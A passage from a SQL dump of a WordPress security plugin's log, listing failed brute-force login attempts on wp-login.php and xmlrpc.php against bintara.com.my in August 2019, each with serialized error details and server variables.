,'notice','2019-08-26 10:15:15','2019-08-26 10:15:14',17682688,19174616,'https://bintara.com.my/wp-login.php',1,0,'34.76.36.242'),(23112,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"216.55.186.18\";s:11:\"REMOTE_PORT\";s:5:\"57194\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOzP0lLQKVpx7Mms7vIDwAAAcE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566815039.5143\";s:12:\"REQUEST_TIME\";s:10:\"1566815039\";}}','notice','2019-08-26 10:24:00','2019-08-26 10:23:59',17683248,19174480,'https://bintara.com.my/wp-login.php',1,0,'216.55.186.18'),(23113,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"191.101.12.135\";s:11:\"REMOTE_PORT\";s:5:\"44316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO1g8c7g4l7i3TBndWXcgAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566815619.1884\";s:12:\"REQUEST_TIME\";s:10:\"1566815619\";}}','notice','2019-08-26 10:33:40','2019-08-26 10:33:39',17684160,19175256,'https://bintara.com.my/wp-login.php',1,0,'191.101.12.135'),(23114,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"191.101.12.135\";s:11:\"REMOTE_PORT\";s:5:\"44812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO1hcc7g4l7i3TBndWXcwAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566815622.0118\";s:12:\"REQUEST_TIME\";s:10:\"1566815622\";}}','notice','2019-08-26 10:33:43','2019-08-26 10:33:42',18200080,19498512,'https://bintara.com.my/xmlrpc.php',1,0,'191.101.12.135'),(23115,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.22.222.219\";s:11:\"REMOTE_PORT\";s:5:\"47887\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO4j0lLQKVpx7Mms7vIkQAAAcg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566816399.4168\";s:12:\"REQUEST_TIME\";s:10:\"1566816399\";}}','notice','2019-08-26 10:46:41','2019-08-26 10:46:39',17685064,19176272,'https://bintara.com.my/wp-login.php',1,0,'165.22.222.219'),(23116,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.22.222.219\";s:11:\"REMOTE_PORT\";s:5:\"48165\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO4mXxaD7qVX4VJuZ-8LwAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566816410.8325\";s:12:\"REQUEST_TIME\";s:10:\"1566816410\";}}','notice','2019-08-26 10:46:52','2019-08-26 10:46:51',18200280,19496688,'https://bintara.com.my/xmlrpc.php',1,0,'165.22.222.219'),(23117,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.166.167.6\";s:11:\"REMOTE_PORT\";s:5:\"45852\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO6Icc7g4l7i3TBndWZfQAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566816801.9274\";s:12:\"REQUEST_TIME\";s:10:\"1566816801\";}}','notice','2019-08-26 10:53:23','2019-08-26 10:53:22',17681976,19173624,'https://bintara.com.my/wp-login.php',1,0,'188.166.167.6'),(23118,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.134.25\";s:11:\"REMOTE_PORT\";s:5:\"43269\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO8Ssc7g4l7i3TBndWaaAAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566817354.7985\";s:12:\"REQUEST_TIME\";s:10:\"1566817354\";}}','notice','2019-08-26 11:02:36','2019-08-26 11:02:35',17686768,19176456,'https://bintara.com.my/wp-login.php',1,0,'128.199.134.25'),(23283,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/blogs/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/blogs/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/blogs/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRGCYir4pgxiIHnHK4qAgAAAcE\";s:12:\"REDIRECT_URL\";s:17:\"/blogs/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"107.180.111.21\";s:11:\"REMOTE_PORT\";s:5:\"56659\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/blogs/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:17:\"/blogs/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRGCYir4pgxiIHnHK4qAgAAAcE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852617.4415\";s:12:\"REQUEST_TIME\";s:10:\"1566852617\";}}','notice','2019-08-26 20:50:19','2019-08-26 20:50:17',18307504,19510536,'http://bintara.com.my/blogs/xmlrpc.php',1,0,'107.180.111.21'),(23284,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/dev/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 